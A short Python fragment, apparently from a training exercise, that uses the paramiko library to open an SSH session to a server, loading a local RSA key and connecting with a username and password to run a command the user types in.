cmd_1 = input('What is the command you want to pass? ')
sshsession = paramiko.SSHClient()
############# IF YOU WANT TO CONNECT USING UN / PW #############
#sshsession.connect(server, username=username, password=password)
############## IF USING KEYS #################
## mykey is our private key
mykey = paramiko.RSAKey.from_private_key_file("/home/student/.ssh/id_rsa")
## if we never went to this SSH host, add the fingerprint to the known host file
sshsession.set_missing_host_key_policy(paramiko.AutoAddPolicy())
## creds to connect
sshsession.connect(hostname=ser_ver, username=user_name, password=pass_word)
## a simple list of commands to issue across our connection
